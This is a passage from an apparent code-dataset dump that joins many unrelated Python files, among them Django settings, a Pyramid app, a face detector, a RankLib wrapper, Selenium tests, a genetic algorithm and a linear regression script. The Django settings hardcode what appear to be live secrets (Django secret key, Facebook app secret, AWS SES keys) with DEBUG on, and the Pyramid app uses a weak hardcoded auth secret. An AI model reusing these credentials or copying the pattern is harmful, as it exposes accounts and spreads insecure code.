(/a/b/myfile.py - 3 = /)\nAPPS_DIR = ROOT_DIR.path('misrutasmx')\n# SECURITY WARNING: keep the secret key used in production secret!\n# ------------------------------------------------------------------------------\nSECRET_KEY = 'x*i5)0^idki5oct&q!+hto7%dwq4)2kb^-*ed3l=53e3k4$rp!'\n# Debug\n# ------------------------------------------------------------------------------\nDEBUG = True\n# Allowed Host\n# ------------------------------------------------------------------------------\nALLOWED_HOSTS = []\n# Application definition\n# ------------------------------------------------------------------------------\nDJANGO_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Useful template tags:\n 'django.contrib.humanize',\n 'django.contrib.sites',\n)\nTHIRD_PARTY_APPS = (\n 'crispy_forms', # Form layouts\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.facebook',\n 'storages',\n 'collectfast',\n)\n# Apps specific for this project go here.\nLOCAL_APPS = (\n # Your stuff: custom apps go here\n 'project.app',\n 'django_facebook',\n)\nFACEBOOK_APP_ID = '470579373130409'\nFACEBOOK_APP_SECRET = '1ee7911efd6231d8bcc9a4e51aee14c2'\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n# MIDDLEWARE CONFIGURATION\n# ------------------------------------------------------------------------------\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\nROOT_URLCONF = 'config.urls'\n# TEMPLATE CONFIGURATION\n# ------------------------------------------------------------------------------\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'project.app.context_processors.globalvar',\n\n 'django_facebook.context_processors.facebook',\n ],\n },\n },\n]\nSITE_ID = 1\n# ALLAUTH CONFIGURATION\n# ------------------------------------------------------------------------------\n# http://django-allauth.readthedocs.org/en/latest\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n# Some really nice defaults\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'none'\n# Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = 'app.User'\nLOGIN_REDIRECT_URL = 'index'\nLOGIN_URL = 'landing'\nSOCIALACCOUNT_QUERY_EMAIL = True\nSOCIALACCOUNT_PROVIDERS = \\\n {'facebook':\n {\n 'METHOD': 'oauth2',\n 'SCOPE': \n [\n 'email', 'public_profile', 'user_friends'\n ],\n 'AUTH_PARAMS': \n {\n 'auth_type': 'reauthenticate'\n },\n 'FIELDS': \n [\n 'id',\n 'email',\n 'name',\n 'first_name',\n 'last_name',\n 'verified',\n 'locale',\n 'timezone',\n 'link',\n 'gender',\n 'updated_time'\n ],\n 'EXCHANGE_TOKEN': True,\n 'LOCALE_FUNC': 'path.to.callable',\n 'VERIFIED_EMAIL': False,\n 'VERSION': 'v2.4'\n }\n }\n# CRISPY TEMPLATE\n# ------------------------------------------------------------------------------\n# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\nWSGI_APPLICATION = 'config.wsgi.application'\n# DATABASE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'misrutasmx.sqlite3',\n 'USER': 'eadmailmx',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n# Internationalization\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\nLANGUAGE_CODE = 'es-MX'\nTIME_ZONE = 'America/Mexico_City'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n# Static files (CSS, JavaScript, Images)\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n str(APPS_DIR.path('static')),\n)\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = str(APPS_DIR('media'))\nMEDIA_URL = '/media/'\n# Mail settings\n# ------------------------------------------------------------------------------\nDEFAULT_FROM_EMAIL = 'MisRutasMX ' #CHANGEME!!!#\nEMAIL_HOST = 'email-smtp.us-east-1.amazonaws.com' #CHANGEME!!!#\nEMAIL_HOST_USER = 'AKIAJ2P4EII4LYULTB4Q' #CHANGEME!!!#\nEMAIL_HOST_PASSWORD = 'Agws0vyhjAsulzVNQsNb+LueMx4AEGYw/jPZyEMTtkQD' #CHANGEME!!!#\nEMAIL_PORT = 587 #CHANGEME!!!#\nEMAIL_USE_TLS = True #CHANGEME!!!#\nEMAIL_SUBJECT_PREFIX = '[MisRutasMX]' #CHANGEME!!!#\n# Celery\n# ------------------------------------------------------------------------------\n#INSTALLED_APPS += ('project.taskapp.celery.CeleryConfig',)\n# if you are not using the django database broker (e.g. rabbitmq, redis, memcached), you can remove the next line.\nINSTALLED_APPS += ('kombu.transport.django',)\nBROKER_URL = 'django://'\n# LOCAL CONFIGURATION\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\nINSTALLED_APPS += ('django_extensions', )\n# SLUGLIFIER\n# ------------------------------------------------------------------------------\nAUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'\n# VARIABLES\n# ------------------------------------------------------------------------------\nAPPTITLE = 'MisRutas.MX'\nTEXTTITLE = 'MisRutas.MX'\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins','console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django_facebook.models': {\n 'handlers': ['mail_admins','console'],\n 'level': 'ERROR',\n 'propagate': True,\n }\n }\n}\n\ntry:\n from .var_production import *\n from boto.s3.connection import OrdinaryCallingFormat\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n # Static and Media Storage\n AWS_ACCESS_KEY_ID = VAR_DJANGO_AWS_ACCESS_KEY_ID\n AWS_SECRET_ACCESS_KEY = VAR_AWS_SECRET_ACCESS_KEY\n AWS_STORAGE_BUCKET_NAME = VAR_AWS_STORAGE_BUCKET_NAME\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n AWS_S3_CALLING_FORMAT = OrdinaryCallingFormat()\n # AWS cache settings, don't change unless you know what you're doing:\n AWS_EXPIRY = 60 * 60 * 24 * 7\n # TODO See: https://github.com/jschneier/django-storages/issues/47\n # Revert the following and use str after the above-mentioned bug is fixed in\n # either django-storage-redux or boto\n AWS_HEADERS = {\n 'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (\n AWS_EXPIRY, AWS_EXPIRY))\n }\n # URL that handles the media served from MEDIA_ROOT, used for managing stored files.\n DEFAULT_FILE_STORAGE = 'config.s3utils.MediaRootS3BotoStorage'\n MEDIA_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME\n MEDIA_ROOT = str(ROOT_DIR('misrutasmx/media'))\n # Static Assests\n # ------------------------\n STATICFILES_STORAGE = 'config.s3utils.StaticRootS3BotoStorage'\n STATIC_URL = 'https://s3.amazonaws.com/%s/static/' % AWS_STORAGE_BUCKET_NAME\n # See: https://github.com/antonagestam/collectfast\n # For Django 1.7+, 'collectfast' should come before 'django.contrib.staticfiles'\n AWS_PRELOAD_METADATA = True\n FACEBOOK_APP_ID = VAR_FACEBOOK_APP_ID\n FACEBOOK_APP_SECRET = VAR_FACEBOOK_APP_SECRET\nexcept:\n pass","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349232772","text":"from pyramid.config import Configurator\nfrom pyramid.authentication import AuthTktAuthenticationPolicy\nfrom pyramid.authorization import ACLAuthorizationPolicy\nfrom pyramid.security import Authenticated, Allow\nfrom sqlalchemy import engine_from_config\nfrom .views import logout\nfrom .utils import get_user\nfrom .models import DBSession, Base\n\n\nclass Root(object):\n __acl__ = [\n (Allow, Authenticated, 'view'),\n ]\n\n def __init__(self, request):\n self.request = request\n\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n engine = engine_from_config(settings, 'sqlalchemy.')\n DBSession.configure(bind=engine)\n Base.metadata.bind = engine\n authn_policy = AuthTktAuthenticationPolicy('sosecret')\n authz_policy = ACLAuthorizationPolicy()\n config = Configurator(\n settings=settings,\n root_factory=Root,\n )\n config.set_authentication_policy(authn_policy)\n config.set_authorization_policy(authz_policy)\n config.set_default_permission('view')\n config.add_forbidden_view(view=logout)\n config.add_static_view('static', 'static', cache_max_age=3600)\n config.add_request_method(get_user, 'user', reify=True)\n config.add_route('home', '/')\n config.add_route('search_result', '/search_result')\n config.add_route('login', '/login')\n config.add_route('logout', '/logout')\n config.add_route('register', '/register')\n config.add_route('history', '/history')\n config.add_route('history_refresh', '/history_refresh')\n config.add_route('top', '/top')\n config.scan()\n return config.make_wsgi_app()\n","sub_path":"pyramidaplication/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"312670164","text":"input_file = open(\"input.txt\", \"r\")\ntext = input_file.read()\nfloor = 0\nposition = 0\n\nfor i, char in enumerate(text):\n if char == \"(\":\n floor += 1\n else:\n floor -= 1\n\n if floor == -1:\n position = i + 1\n break\n\ninput_file.close()\nprint(position)\n","sub_path":"2015/day 1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"190127109","text":"import cv2\r\n\r\nclass Camera:\r\n\r\n def __init__(self, cameraNumber, path='haarcascade_frontalface_default.xml', window='videoWindow'):\r\n self.videoCapture = cv2.VideoCapture(cameraNumber)\r\n self.pathXML = path\r\n self.classfier = cv2.CascadeClassifier(self.pathXML)\r\n self.window = window\r\n cv2.namedWindow(self.window)\r\n cv2.moveWindow(self.window, 0, 0)\r\n\r\n def getCameraFrame(self):\r\n boolReturn, frame = self.videoCapture.read()\r\n return boolReturn, frame\r\n\r\n def showFrame(self, frame):\r\n cv2.imshow(self.window, frame)\r\n\r\n def cleanup(self):\r\n self.videoCapture.release()\r\n cv2.destroyAllWindows()\r\n\r\n def detectFaces(self, frame):\r\n # global previousX, previousY, minXX, minYY\r\n\r\n cascade = self.classfier\r\n image_copy = frame.copy()\r\n\r\n # convert the test image to gray scale as opencv face detector expects gray images\r\n gray_image = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY)\r\n\r\n # Applying the haar classifier to detect faces\r\n facesDetected = cascade.detectMultiScale(gray_image, scaleFactor = 2, minNeighbors = 5)\r\n\r\n #minimumdistance = 800\r\n\r\n centers = []\r\n\r\n if len(facesDetected) != 0:\r\n print(facesDetected)\r\n for (x, y, w, h) in facesDetected:\r\n cv2.rectangle(image_copy, (x, y), (x + w, y + h), (0, 255, 100), 5)\r\n\r\n # Center of the rectangle\r\n cv2.line(image_copy, (x + int(1 / 2 * w), y + int(1 / 2 * h)), (x + int(1 / 2 * w), y + int(1 / 2 * h)),\r\n (0, 0, 255), 7)\r\n\r\n xx = x + int(1 / 2 * w)\r\n yy = y + int(1 / 2 * h)\r\n centers.append((xx, yy))\r\n\r\n return image_copy, centers\r\n \r\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"573681873","text":"# Stronger baseline: Listwise L2R - LambdaMART\n# Hyperparameter optimziation HPonsteroids requires Python 3!\n\n\n# In[2]:\n\n\n# Imports\nimport os\nimport subprocess\nimport sys\n\n# HPO\n\n\nimport ConfigSpace as CS\nimport ConfigSpace.hyperparameters as CSH\n\nfrom hpbandster.core.worker import Worker\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\n\n# HPO server and stuff\n\n# import logging\n# logging.basicConfig(level=logging.WARNING)\n\nimport argparse\n\nimport hpbandster.core.nameserver as hpns\nimport hpbandster.core.result as hpres\n\nfrom hpbandster.optimizers import BOHB as BOHB\nfrom hpbandster.optimizers import RandomSearch as RS\nfrom hpbandster.examples.commons import MyWorker\n\n\n# In[2]:\n\n\n# In[3]:\n\n\n# Functions\ndef generate_run_file(pre_run_file, run_file):\n \n with open(pre_run_file, 'rt') as input_f:\n pre_run = input_f.readlines()\n# print('Aqui veo si genero o no el run file: ',type(pre_run))\n with open(run_file, 'wt') as out_f:\n for line in pre_run:\n out_f.write(line.replace('docid=','').replace('indri', 'lambdaMART'))\n \n\n\n# In[4]:\n\n\n# Classes\nclass L2Ranker:\n def __init__(self, ranklib_location, params, test_data_file, normalization=[]):\n self.ranklib_location = ranklib_location\n # Works with Oracle JSE\n # java version \"1.8.0_211\"\n # Java(TM) SE Runtime Environment (build 1.8.0_211-b12)\n # Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)\n self.params = params\n self.log_file = ''\n self.ranker_command = ['java', '-jar', ranklib_location + 'RankLib-2.12.jar']\n self.normalization = normalization\n self.test_data_file = test_data_file\n self.save_model_file = ''\n \n# def build(self, ir_tool_params):\n def train(self, train_data_file, save_model_file, config):\n self.save_model_file = save_model_file\n self.log_file = save_model_file + '.log'\n toolkit_parameters = [\n *self.ranker_command, # * to unpack list elements\n '-train',\n train_data_file,\n *self.normalization,\n *self.params,\n# *self.params[2:], # [2:] To suppress the validation process during training\n '-leaf', \n str(config['n_leaves']),\n '-shrinkage',\n str(config['learning_rate']),\n '-tree', # One regression tree per boosted iteration\n str(config['n_trees']),\n '-save',\n self.save_model_file \n ] \n \n print(toolkit_parameters)\n with open(self.log_file, 'wt') as rf:\n proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=rf, stderr=subprocess.STDOUT, shell=False)\n# proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False)\n \n (out, err)= proc.communicate()\n# print(out.decode('utf-8').splitlines())\n# print(out)\n# print(err)\n print('Model saved: ', self.save_model_file)\n \n \n\n def gen_run_file(self, test_data_file, run_file):\n pre_run_file = run_file.replace('run_', 'pre_run_', 1)\n toolkit_parameters = [\n *self.ranker_command, # * to unpack list elements\n '-load',\n self.save_model_file,\n *self.normalization,\n '-rank',\n test_data_file,\n '-indri',\n pre_run_file \n ] \n \n print(toolkit_parameters)\n with open(self.log_file, 'at') as rf:\n proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=rf, stderr=subprocess.STDOUT, shell=False)\n# proc = subprocess.Popen(toolkit_parameters,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False)\n \n (out, err)= proc.communicate()\n# print(out.decode('utf-8').splitlines())\n# print(out)\n# print(err)\n\n \n generate_run_file(pre_run_file, run_file)\n \n# print('Run model saved: ', run_file)\n","sub_path":"ir_lmart.py","file_name":"ir_lmart.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"518411174","text":"\"\"\"An assessment excercise for Levels Beyond by Kyle Olsen\"\"\"\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass TestReachEngineCom(unittest.TestCase):\n \"\"\"Tests basic functionality of www.reachengine.com.\n\n An automation assignment which tests the basic functionality of\n www.reachengine.com. Requirement descriptions are listed in\n QA_automation_assignment.pdf.\n\n Attributes:\n driver: The Selenium driver\n \"\"\"\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(10) #Wait time in seconds\n\n def test_google_reach_engine(self):\n self.driver.get('http://www.google.com')\n\n search = self.driver.find_element_by_name('q')\n search.send_keys('levels beyond reach engine')\n search.send_keys(Keys.RETURN)\n\n result = self.driver.find_element_by_id('rso')\n self.assertIn('www.reachengine.com',\n result.find_element_by_xpath('//div/cite').text)\n result.find_element_by_xpath('//div/h3/a').click()\n\n self.assertIn('Reach Engine',\n self.driver.find_element_by_id('footer-info').text)\n\n def test_our_team(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n self.assertIn('Our Team',\n self.driver.find_element_by_xpath('//h1').text)\n\n def test_art_ceo(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n member_search = self.driver.find_elements_by_class_name('et_pb_team_member_description')\n for member in member_search:\n if member.find_element_by_class_name('et_pb_member_position').text == 'CEO':\n self.assertIn('Art Raymond', member.find_element_by_xpath('//h4').text)\n break\n else:\n self.fail(\"No CEO was found.\")\n\n def test_art_search(self):\n self.driver.get('https://www.reachengine.com/company/team/')\n\n art_search = self.driver.find_elements_by_xpath('//*[contains(text(),\"Art Raymond\")]')\n self.assertTrue(len(art_search) >= 3)\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test_reach_engine_com.py","file_name":"test_reach_engine_com.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95262939","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata = np.loadtxt('GAIL_TRPO_Pusher.csv', delimiter=',')\ninput1 = data[:,0]\noutput = data[:,1]\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\n\nx = np.linspace(-6,6,1000)\n#plt.style.use('ggplot')\n#ax.plot(input1, output, color='blue', linestyle='solid')\nax.plot(input1, output)\n\nax.set_title('Pusher')\nax.set_xlabel('Time Steps')\nax.set_ylabel('Rewards')\nax.grid(True)\n\nplt.savefig(\"GAIL_TRPO_Pusher.eps\")\nfig.show()\n","sub_path":"2eps2.py","file_name":"2eps2.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"358101772","text":"import os, json\nDIR = os.path.dirname(os.path.abspath(__file__))\ndataDir = \"../data/\"\ndef getPOS(myfile=\"toFr-1.0.json\"):\n dataFile = dataDir+myfile\n dataFilepath = os.path.join(DIR, dataFile)\n with open (dataFilepath) as f:\n data = json.load(f)\n parseJson(data)\n\n\ndef parseJson(data):\n listPOS = []\n for word in data[\"translations\"]:\n listPOS.extend(parseEntry(word[\"source\"]))\n for entry in word[\"target\"]:\n listPOS.extend(parseEntry(entry))\n print(set(listPOS))\n\ndef parseEntry(entry):\n sensePOSList = []\n for sense in entry[\"sense\"]:\n sensePOSList.append(sense[\"partOfSpeech\"])\n return sensePOSList\n\ngetPOS()","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605404505","text":"# 多目标遗传算法模型\n# 尝试从矩阵B为初始化集群,看是否能加快收敛速度\nimport numpy as np\nimport pandas as pd\nimport xlrd\ndf1 = pd.read_excel('模型参数.xls',sheetname='Sheet1',header =0 )\ndf2 = pd.read_excel('模型参数.xls',sheetname='Dij',header=None)\nDNA_SIZE = 55#避难点 DNA序列\nPOP_SIZE = 1000\nCROSS_RATE = 0.7\nMUTATION_RATE = 0.35\nN_GENERATIONS = 1000\nS = df1['S'].dropna(axis=0).values #居住面积\nD = df2.values #距离矩阵\nP = df1['P'].values # 每个居住地人口数\nDmax = df1['Dmax'].values\nB_toSub = []\ndef F1(pop):\n\t# pop --> [100,243,55]\n\tYY = []\n\tfor ii in range(len(pop)):\n\t\tYY.append(solve_Y(pop[ii]))\n\t# S -->[55,1]\n\tY = np.array(YY)\n\t# Y -->[POP_size,55]\n\treturn np.dot(Y,S)\ndef F2(pop):\n\tDist = []\n\tfor j in range(len(pop)):\n\t\tB = pop[j]\n\t\tdist = np.sum(B*D)\n\t\tDist.append(dist)\n\treturn np.array(Dist)\ndef get_fitness(v1,v2,pop):\n\t# v1/2 -->[100,]\n\t# 计算基于帕累托原理的适应度\n\tnq = []\n\tfor x in range(POP_SIZE):\n\t\tcompare = 0\n\t\tcount = 0\n\t\tfor xx in range(POP_SIZE):\n\t\t\tif v1[x] < v1[xx]:\n\t\t\t\tcompare +=1\n\t\t\tif v1[x]>v1[xx]:\n\t\t\t\tcontinue\n\t\t\tif v2[x] < v2[xx]:\n\t\t\t\tcompare +=1\n\t\t\tif v2[x]>v2[xx]:\n\t\t\t\tcontinue\n\t\t\tif compare >=1:\n\t\t\t\tcount = count+1\n\t\tfitness_add = int(POP_SIZE*0.8)\n\t\tif isSubjectTo(pop[x]):\n\t\t\tnq.append(fitness_add)\n\t\telse:\n\t\t\tnq.append(count+1)\n\treturn nq\n\ndef select(pop,fitness):\n\tglobal POP_SIZE\n\tidx = np.random.choice(np.arange(POP_SIZE), size=POP_SIZE, replace=True,p=fitness/fitness.sum())\n\treturn pop[idx]\n\ndef crossover(parent, pop):\n # 判断族群是否发生交配\n if np.random.rand() < CROSS_RATE :\n \t# 在pop中随机挑选与parent交配的个体\n\t i_ = np.random.randint(0, POP_SIZE, size=1)\n\t # 随机生成基因序列中发生交配的基因位置\n\t cross_points = np.random.randint(0, 2, size=243).astype(np.bool)\n\t # 替换基因位\n\t parent[cross_points] = pop[i_, cross_points,:]\n return parent\n\ndef mutate(child):\n\tif np.random.rand() < MUTATION_RATE:\n\t\tfor point in range(243):\n\t\t if np.random.rand() < MUTATION_RATE:\n\t\t child[point,:] = np.zeros((1,55))\n\t\t dna_point = np.random.choice(np.arange(DNA_SIZE), size=1, replace=True,p=S/S.sum())\n\t\t child[point,dna_point] = 1\n\treturn child\ndef solve_Y(B):\n\t# 解出方程BY=E的解Y,其实Y很好解,只要B某列存在不为0的值,那么Y这一列就是1\n\t# Y-->[55,]\n\tY = np.zeros((55))\n\tB_sum = B.sum(axis=0)\n\tY[B_sum>0] = 1\n\treturn Y\n\ndef isSubjectTo(B):\n\t#计算当前方案55个避难所的容量要求\n\t#abc = P.T\n\tcapacity_need = np.dot(P.T,B)\n\tY = solve_Y(B)\n\tcapacity = Y*S\n\tdiff = capacity_need-capacity\n\tst1 = diff[diff>0].size\n\t# 计算限制条件2,距离条件\n\tdist_sum = np.sum(B*D,axis=1)\n\tdiff2 = dist_sum-Dmax\n\tst2 = diff2[diff2>0].size\n\tif st1 == 0 and st2 == 0:\n\t\tprint('找到满足的条件的',Y)\n\t\tB_toSub.append(B)\n\t\tTag = True\n\telse:\n\t\tprint(st1,st2)\n\t\tTag = False\n\treturn Tag\n\ndef init_pop():\n\tpop = np.zeros([POP_SIZE,243,DNA_SIZE])\n\tfor index in range(POP_SIZE):\n\t\tfor index_ in range(243):\n\t\t\tone_ind = np.random.randint(0,DNA_SIZE,1)\n\t\t\tpop[index,index_,one_ind] = 1\n\treturn pop\npop = init_pop()\ncount_all = []\nfor _ in range(N_GENERATIONS):\n\tcount = 0\n\tv1 = F1(pop)\n\tv2 = F2(pop)\n\tfitness = np.array(get_fitness(v1,v2,pop))\n\t# print(\"Most fitted DNA: \", pop[np.argmax(fitness), :])\n\tpop = select(pop,fitness)\n\tpop_copy = pop.copy()\n\tfor parent in pop:\n\t\tif isSubjectTo(parent):\n\t\t\tcount +=1\n\t\tchild = crossover(parent,pop_copy)\n\t\tchild = mutate(child)\n\t\tparent[:] = child\n\tcount_all.append(count/POP_SIZE)\n\tprint(\"已经循环\",_,'轮次')\n\tif POP_SIZE > 100:\n\t\tPOP_SIZE = POP_SIZE-15\n\telse:\n\t\tPOP_SIZE = 100","sub_path":"多目标遗传算法模型.py","file_name":"多目标遗传算法模型.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499191617","text":"\"\"\"\nUsing a Brickman (robot) as the receiver of messages.\n\"\"\"\n\n# Same as m2_fake_robot_as_mqtt_sender,\n# but have the robot really do the action.\n# Implement just FORWARD at speeds X and Y is enough.\n\nimport tkinter\nfrom tkinter import ttk\nimport mqtt_remote_method_calls as com\nimport time\n\ndef main():\n root = tkinter.Tk()\n\n frame = ttk.Frame(root, padding=10)\n frame.grid()\n\n # -------------------------------------------------------------------------\n # This example puts the widgets in a 3-column, 2-row grid\n # with some of the grid-places empty. Here are the WIDGETS:\n # -------------------------------------------------------------------------\n\n label = ttk.Label(frame, text=\"movement\")\n entry_box = ttk.Entry(frame)\n entry_box2 = ttk.Entry(frame)\n\n button1 = ttk.Button(frame, text=\"forward\")\n button1['command'] = (lambda: send_it(entry_box,entry_box2))\n\n\n # -------------------------------------------------------------------------\n # Here is the use of GRID with rows and columns:\n # -------------------------------------------------------------------------\n label.grid(row=0, column=0)\n entry_box.grid(row=1, column=0)\n entry_box2.grid(row=1,column=1)\n button1.grid(row=0, column=1)\n root.mainloop()\n\ndef send_it(x,y):\n mqtt_client = com.MqttClient()\n mqtt_client.connect('Kirk', 'Preston')\n time.sleep(1) # Time to allow the MQTT setup.\n mqtt_client.send_message('handle_forward',[x.get(),y.get()])\n print()\n\nmain()\n","sub_path":"src/m3_robot_as_mqtt_receiver.py","file_name":"m3_robot_as_mqtt_receiver.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"297662366","text":"#Multiple Linear Regression\n#Author :JC\n#Date : 30 Nov 19\n\nimport numpy as np\n\nm,n = map(int,input().split())\nY = []\nX = []\nX_ip = []\n\nfor j in range(0,n):\n a = list(map(float,input().split()))\n X.append(1)\n for b in range(0,m):\n X.append(a[b])\n Y.append(a[-1])\n\ni = int(input())\n# print(i)\nfor x in range(0,i):\n # print(x)\n a = list(map(float,input().split()))\n X_ip.append(1)\n for b in range(0,m):\n X_ip.append(a[b])\n\nX = np.array(X).reshape(n,m+1)\n# print(X)\n\nY = np.array(Y).reshape(n,1)\n# print(Y)\n\nX_ip = np.array(X_ip).reshape(i,m+1)\n# print(X_ip)\n\nX_t = X.transpose()\nA_temp_1 = X_t.dot(X)\nA_temp_1_inv = np.linalg.inv(A_temp_1)\nA_temp_2 = A_temp_1_inv.dot(X_t)\nB = A_temp_2.dot(Y)\n\nY_op = X_ip.dot(B)\n\nfor x in range(0,i):\n print(float(Y_op[x]))\n\n \n\n","sub_path":"Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"341388781","text":"import json\nimport os\n\n#The .json files that contain the similar images (created by compare_images.py)\nJSON_FILE_PATHS = ['similar-covid-images.json','similar-normal-images.json','similar-pneumonia-images.json']\n\ndef main():\n #Removes the duplicates that are stored in the .json files\n for file_path in JSON_FILE_PATHS:\n remove_duplicates(file_path)\n\n\ndef remove_duplicates(json_file_path):\n \"\"\"\n This will remove all the duplicates from an image, given in the json file\n The json has to have the following format:\n {\n 'image1.png':['image2.png','image3.png']\n 'image2.png':['image4.png','image5.png']\n ..-\n }\n That means that image1 & image2 are very similar, and image1 & image3 are very similar.\n\n\n Args:\n json_file_path (string): oath to the json file\n \"\"\"\n import json\n count = 0\n with open(json_file_path) as f:\n similarities = json.load(f) \n for _ , duplicates in similarities.items():\n for duplicate in duplicates:\n try:\n os.remove(duplicate)\n except:\n print('failed to delete...')\n count = count + 1\n print(f\"Removed {count} images.\")\n\nif __name__ == '__main__':\n main()","sub_path":"CV-Code/remove_duplicate_images.py","file_name":"remove_duplicate_images.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213826115","text":"# This is a 